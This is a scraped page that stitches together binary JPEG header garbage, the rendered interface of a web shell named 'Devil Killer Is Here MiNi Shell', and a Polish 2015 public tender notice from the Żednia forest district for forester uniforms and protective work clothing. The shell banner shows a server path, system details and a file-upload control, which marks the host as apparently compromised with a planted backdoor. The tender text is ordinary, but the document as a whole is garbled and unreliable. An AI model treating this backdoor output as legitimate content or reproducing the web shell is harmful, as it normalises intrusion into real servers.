JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/53410-N-2015.html

<p class="kh_header"><b>Michałowo: Dostawa sortów mundurowych leśnika oraz środków ochrony indywidualnej, odzieży i obuwia roboczego do Nadleśnictwa Żednia w roku 2015</b><br>
<b>Numer ogłoszenia: 53410 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Żednia , Żednia 5, 16-050 Michałowo, woj. podlaskie, tel. 085 7175251, 7175252, faks 085 7175252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bialystok.lasy.gov.pl/web/zednia</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych leśnika oraz środków ochrony indywidualnej, odzieży i obuwia roboczego do Nadleśnictwa Żednia w roku 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sortów mundurowych leśnika oraz środków ochrony indywidualnej, odzieży i obuwia roboczego do Nadleśnictwa Żednia podzielona na dwa pakiety.

Pakiet nr 1 - Dostawa mundurów, oznak i przedmiotów uzupełniających do mundurów leśnika wykonanych według wzorów określonych: 
1.1.	Rozporządzanie Ministra Środowiska z 09 grudnia 2014 r. w sprawie wzoru munduru leśnika i oznak uprawnionych do ich noszenia.
Mundury leśnika i oznaki, których wzory zostały określone w rozporządzeniu Ministra Środowiska z dnia 12 marca 2007 r. w sprawie wzoru mundurów leśnika i oznak dla osób uprawnionych do ich noszenia (Dz. U. Nr 51, poz. 342), mogą być noszone przez osoby uprawnione do ich noszenia do dnia 31 grudnia 2017 r.

1.2. Zarządzeniem nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika. 
1.3. Zarządzeniem nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja 2012r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnika. 
1.4. Zarządzeniem nr 54 Dyrektora Generalnego Lasów Państwowych z dnia 6 lipca 2012r. w sprawie zmiany Zarządzenia nr 44 Dyrektora Generalnego Lasów Państwowych z dnia 14 maja 2012r. w sprawie zmian w dokumentacji techniczno-technologicznej dla niektórych przedmiotów mundurów leśnik.
1.5. Zarządzenie nr 62 Dyrektora Generalnego Lasów Państwowych z dnia 15 lipca 2013 w sprawie wzorca oraz zasad użytkowania mundurów leśnika przez pracowników Lasów Państwowych. 

Pakiet nr 2 - Dostawa odzieży i obuwia roboczego, do Nadleśnictwa Żednia w roku 2015.

Szczegółowy opisy przedmiotu zamówienia zawiera (Załącznik nr 1.1, 1.2 do SIWZ)

2. Nazwy i kody CPV dotyczące przedmiotu zamówienia określone  we Wspólnym Słowniku Zamówień:
18000000-9	Odzież obuwie artykuły bagażowe i dodatki
18100000-0	Odzież branżowa, specjalna odzież robocza i dodatki
18140000-2	Dodatki do odzieży roboczej
18200000-1	Odzież wierzchnia 
18300000-2	Części garderoby
18400000-3	Odzież specjalna i dodatki
18800000-7	Obuwie

3. Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest dostarczyć przed podpisaniem umowy ważne świadectwa lub upoważnienia, iż elementy umundurowania będące przedmiotem dostawy są zgodne z zapisami techniczno-technologicznej dokumentacji stanowiącej opis przedmiotu zamówienia, przedstawiając Zamawiającemu kopie świadectwa lub upoważnienia, wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu Nowy Bedoń, ul. Sienkiewicza 19, 95-020 Andrespol na zgodności elementów munduru będących przedmiotem dostawy ze wzorcem munduru leśnika zatwierdzonym przez Dyrektora Generalnego Lasów Państwowych Zarządzeniem nr 62 Dyrektora Generalnego Lasów Państwowych z dnia 15 lipca 2013 w sprawie wzorca oraz zasad użytkowania mundurów leśnika przez pracowników Lasów Państwowych.
4.  Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu zobowiązany jest do prowadzenia w trakcie obowiązywania umowy punktu wydawania sortów mundurowych i odzieży BHP w odległości nie większej niż 40 km od siedziby Zamawiającego (oświadczenie na formularzu oferty), gwarantującego możliwość przymiarki i odbioru elementów umundurowania i odzieży upoważnionym pracownikom Zamawiającego. Wykonawca zobowiązany jest do pisemnego (pod rygorem nieważności) poinformowania Zamawiającego, w terminie 14 dni od podpisania umowy, o adresie w/w punktu wydawania sortów mundurowych i odzieży BHP. W przypadku niewywiązania się przez Wykonawcę z powyższych obowiązków, Zamawiający uprawniony jest do odstąpienia od umowy na dostawę sortów mundurowych lub odzieży Bhp łączącej go z Wykonawcą w terminie 30 dni, od dnia kiedy Zamawiający powziął wiadomość o okolicznościach uzasadniających odstąpienie od umowy z w/w przyczyny. 
5. Zamawiającemu oraz upoważnionym przez niego pracownikom przysługuje prawo do odbioru przedmiotu dostawy bezpośrednio w w/w punkcie wydawania sortów mundurowych i odzieży BHP.
Dostawy elementów umundurowania oraz środków ochrony indywidualnej, odzieży i obuwia roboczego będą realizowane sukcesywnie przy zachowaniu następujących form realizacji zamówienia
- indywidualnie, sorty mundurowe i odzież BHP dla poszczególnych, uprawnionych pracowników, w oparciu o upoważnienie (w uprzednio uzgodnionej formie) wydane przez Zamawiającego, w punkcie sprzedaży Wykonawcy, oddalonym nie więcej niż 40 km od siedziby Zamawiającego, w uzgodnionych z nimi ilościach, rozmiarach, rodzajach sortymentu i terminach, nie dłuższych niż 10 dni od złożenia zamówienia indywidualnego (podstawowa forma realizacji przedmiotu zamówienia),

6. Dodatkowe warunki dotyczące przedmiotu zamówienia: 
a)	Termin płatności: zgodnie z formularzem cenowym złożonym przez Wykonawcę.
b)	Nie przewiduje się zaliczek na poczet materiałów.
c)	Forma zapłaty - jak we wzorze umowy - załącznik nr 8 do specyfikacji istotnych warunków zamówienia.
d)	Zamawiający zastrzega możliwość redukcji zamówienia. Określone w formularzu oferty ilości przedmiotu zamówienia są ilościami szacunkowymi 
i nie zobowiązują Zamawiającego do realizacji zamówienia w pełnych ilościach.     
e)	Zamawiający zastrzega możliwość  zmiany ilości poszczególnych elementów sortów mundurowych w trakcie realizacji umowy, pod warunkiem, 
iż  wynagrodzenie Wykonawcy nie ulegnie zwiększeniu.
f)	Zamawiający zastrzega prawo unieważnienia postępowania na podstawie art. 93 ust. 1 i ust. 2 ustawy prawo zamówień publicznych.
g)	Wykonawca zapewni co najmniej 24 miesięczną (liczoną od daty dostawy/odbioru przez osoby uprawnione) gwarancję na dostarczone przedmioty zamówienia na warunkach określonych w umowie
h)	Wykonawca wskaże w ofercie (oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom.

4. Opis części zamówienia, jeżeli zamawiający dopuszcza składanie ofert częściowych
Zamawiający dopuszcza składanie ofert częściowych na jeden lub dwa pakiety.
1. Pakiet Nr 1: sorty mundurowe leśnika
Łączną ilość zamówienia w rozbiciu na poszczególne elementy umundurowania zawiera tabela poniżej (szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1.1 do SIWZ):
Mundur wyjściowy	Jednostka miary	Ilość jednostek
Marynarka męska - gabardyna lub tropik	sztuka	3
Marynarka damska- gabardyna lub tropik	sztuka	2
Spodnie męskie- gabardyna lub tropik	sztuka	6
Spodnie damskie- gabardyna lub tropik	sztuka	2
Marynarka męska- gabardyna z wykończeniem oleofobowym	sztuka	7
Spodnie męskie- gabardyna z wykończeniem oleofobowym	sztuka	17
Spódnica - gabardyna lub tropik	sztuka	3
Spódnica - gabardyna z wykończeniem oleofobowym	sztuka	-
Koszula męska	sztuka	6
Bluzka damska	sztuka	2
Koszula męska - bawełna 100%	sztuka	23
Bluzka damska - bawełna 100%	sztuka	2
Krawat	sztuka	20
Czapka wyjściowa z wizerunkiem orła	sztuka	7
Kapelusz damski 	sztuka	1
Kapelusz męski	sztuka	2
Kurtka męska 	sztuka	6
Kurtka damska	sztuka	1
Szalik	sztuka	5
Rękawice damskie męskie	para	9
Skarpety letnie termoaktywne	para	24
Skarpety przejściowe termoaktywne	para	38
Skarpety zimowe termoaktywne	para	37
Półbuty męskie	para	14
Półbuty damskie	para	3
Mundur codzienny leśnika		Zamawiana ilość
Koszula męska z długim rękawem	sztuka	6
Bluzka damska z długim rękawem	sztuka	-
Koszula męska z krótkim rękawem	sztuka	8
Bluzka damska z krótkim rękawem	sztuka	2
Koszula męska z długim rękawem - bawełna 100%	sztuka	22
Bluzka damska z długim rękawem - bawełna 100%	sztuka	2
Koszula męska z krótkim rękawem - bawełna 100%	sztuka	12
Bluzka damska z krótkim rękawem - bawełna 100%	sztuka	-
Sweter	sztuka	47
Kamizelka	sztuka	17
Bluza z polaru typu windstoper	sztuka	47
Kurtka wierzchnia	sztuka	17
Czapka zimowa z wizerunkiem orła	sztuka	5
Peleryna	sztuka	2
Półbuty typu Sympatex	para	41
Półbuty typu Gore-tex	para	16
Mundur terenowy leśnika		Zamawiana ilość
Bluza z kamizelką letnią	sztuka	10
Spodnie letnie	sztuka	71
Czapka letnia terenowa z wizerunkiem orła	sztuka	19
Kurtka zimowa	sztuka	7
Spodnie zimowe	sztuka	13
Czapka zimowa terenowa z wizerunkiem orła	sztuka	11
Trzewiki typu Sympatex	para	19
Trzewiki typu Gore-tex niskie	para	7
Trzewiki typu Gore-tex wysokie	para	7
Trzewiki typu Sympatex z ociepleniem typu Thinsulate	para	9
Trzewiki typu Gore-tex niskie z ociepleniem typu Thinsulate	para	5
Trzewiki typu Gore-tex  wysokie z ociepleniem typu Thinsulate	para	7
Oznaki		Zamawiana ilość
Oznaki służbowe wyhaftowane bajorkiem	para	6

Szczegółowy opis tej części przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ. 
2. Pakiet Nr 2: Środki ochrony indywidualnej, odzież i obuwie robocze, odpowiadające wymaganiom określonym w Polskich Normach oraz posiadające odpowiednio certyfikat albo deklarację zgodności z tymi normami, w ilościach jak niżej (szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1.2 do SIWZ ):
Lp.	Przedmiot  zamówienia	Jednostka
miary	Ilość
1	2	5	6
1.	Ubranie letnie (w tym dwie pary spodni)	komplet	52
2.	Ubranie ocieplane, tkanina z membraną oddychającą.	komplet	52
3.	Kurtka przeciwdeszczowa, spodnie przeciwdeszczowe.	komplet	25
4.	Kurtka przeciw deszczowa, spodnie przeciw deszczowe - pracownicy grupy 4-7.	komplet	10
5.	Ubranie całoroczne.	komplet	5
6.	T-shirt 	szt.	57
7.	Koszula robocza 	szt.	57
8.	Koszula robocza - pracownicy grupy 4-7	szt.	10
9.	Bielizna termoaktywna 	komplet	67
10.	Stuptuty	szt.	57
11.	Skarpety termo aktywne letnie i zimowe 	para	67
12.	Buty (gumowe) wodoodporne i ciepłochronne	szt.	67
13.	Buty terenowe wodochronne z membraną oddychającą	szt.	57
14.	Buty gumowe	szt.	62
15.	Czapka letnia	szt.	57
16.	Czapka ocieplana	szt.	57
17.	Czepek pod hełm ochronny 	szt.	61
18.	Okulary ochronne - gogle	szt.	57
19.	Kamizelka ostrzegawcza	szt.	70
20.	Rękawice robocze 	para	300
21.	Rękawice ocieplane	para	52
22.	Maska przeciwpyłowa - jednorazowa.	szt.	120
23.	Kamizelka ciepłochronna:	szt.	2
24.	Fartuch roboczy	szt.	2
25.	Rękawice ochronne 	para	2
26.	Ubrania letnie w kolorze ostrzegawczym	komplet	10
27.	Buty ochronne, podnosek ochronny	szt.	10
28.	Buty gumowe wodoodporne, podnosek ochronny	szt.	10
29.	Ubranie ocieplane- pracownicy grupy 4-7	komplet	10
30.	Buty gumowe, wodoodporne, ciepłochronne, podnosek ochronny 	szt.	10
31.	Okulary przeciwsłoneczne	szt.	35
32.	Czapka letnia 	szt.	10
33.	Czapka ocieplana.	szt.	10
34.	Ochronniki słuchu	szt.	2
35.	Kamizelka ocieplająca 	szt.	3
36.	Trzewiki 	szt.	1
37.	Nakolanniki	szt.	1
38.	Fartuch ochronny	szt.	1
39.	Kombinezon do oprysków 	Szt.	2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 18.10.00.00-0, 18.14.00.00-2, 18.20.00.00-1, 18.30.00.00-2, 18.40.00.00-3, 18.80.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność objęta przedmiotem zamówienia nie wymaga posiadania specjalnych uprawnień, w związku z czym Zamawiający nie wymaga posiadania takich uprawnień. Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat, w przed upływem składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, wraz z podaniem  ich wartości, przedmiotu dat ich wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dla pakietu nr 1: minimum trzy dostawy sortów mundurowych na łączną kwotę  nie mniejszą niż 80 tys. zł 
Dla Pakietu nr 2: minimum trzy dostawy odzieży bhp na łączną kwotę nie mniejszej niż 80 tys. zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, oświadczy że spełnia w/w warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykazali i udokumentowali spełnienie wymogów jakościowych w zakresie dostaw będących przedmiotem zamówienia:
 - Zamawiający żąda aby w pakiecie nr 2 razem z ofertą  były złożone następujące  wzory odzieży BHP:
LP	NAZWA SORTYMENTU	Jednostka miary	Ilość  jednostek
1	2	3	4
SŁUŻBA LEŚNA I STAŻYŚCI
1	Ubranie letnie (w tym 2 pary spodni)	komplet	1
2	Ubranie ocieplane, tkanina z membraną oddychającą	komplet	1
3	Buty terenowe, wodochronne, z membraną oddychającą	para	1
4	Buty (gumowe) wodoodporne i ciepłochronne	para	1
5	Okulary przeciwsłoneczne / polaryzacyjne 	szt.	1
 			 
ROBOTNICY 
6	Ubranie letnie (w tym 2 pary spodni), w kolorze ostrzegawczym	komplet	1
7	Ubranie ocieplane (w tym 2 pary spodni), w kolorze ostrzegawczym	komplet	1
8	Buty ochronne, podnosek ochronny	para	1
9	Buty (gumowe) wodoodporne, podnosek ochronny	para	1
10	Buty (gumowe) wodoodporne i ciepłochronne, podnosek ochronny	para	1
11	Okulary przeciwsłoneczne / polaryzacyjne	szt.	1
12	Trzewiki	para	1
ADMINISTRACJA
13	Kamizelka ciepłochronna	szt.	1

- Dostarczone wzory odzieży BHP powinny być odpowiednio opisane nazwę Wykonawcy oraz nazwę dostarczanej odzieży.
- Przy sprawdzaniu ofert powołana komisja przetargowa weźmie pod uwagę również złożone wzory odzieży Bhp, jeżeli nie będą spełniały wymagań opisanych przez zamawiającego, Zamawiający zastrzega wykluczenie wykonawcy na podstawie 
art. 24 ust. 2 pkt. 4.
- Złożone wzory odzieży Bhp zostaną zwrócone Wykonawcy po wyborze oferty najkorzystniejszej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełnionego i podpisanego  Formularza oferty, z wykorzystaniem wzoru stanowiącego załącznik nr 2 do SIWZ,
- wypełnionego i podpisanego formularza cenowego z wykorzystaniem wzoru stanowiącego załącznik nr 3 a lub 3 b do SIWZ, (w zależności od pakietu na który dostawca składa ofertę),
- informacja z listą podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych albo informację o tym, że wykonawca nie należy do grupy kapitałowej  (wg wzoru - załącznik nr 7).
- pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum, spółek cywilna),
- dokumentu/ów określającego zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy,
-</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Wszelkie postanowienia zawiera wzór umowy stanowiący załącznik nr 8 do specyfikacji istotnych warunków  zamówienia .
2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
3. Zamawiający dopuszcza możliwość dokonania zmiany warunków umowy w przypadkach, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
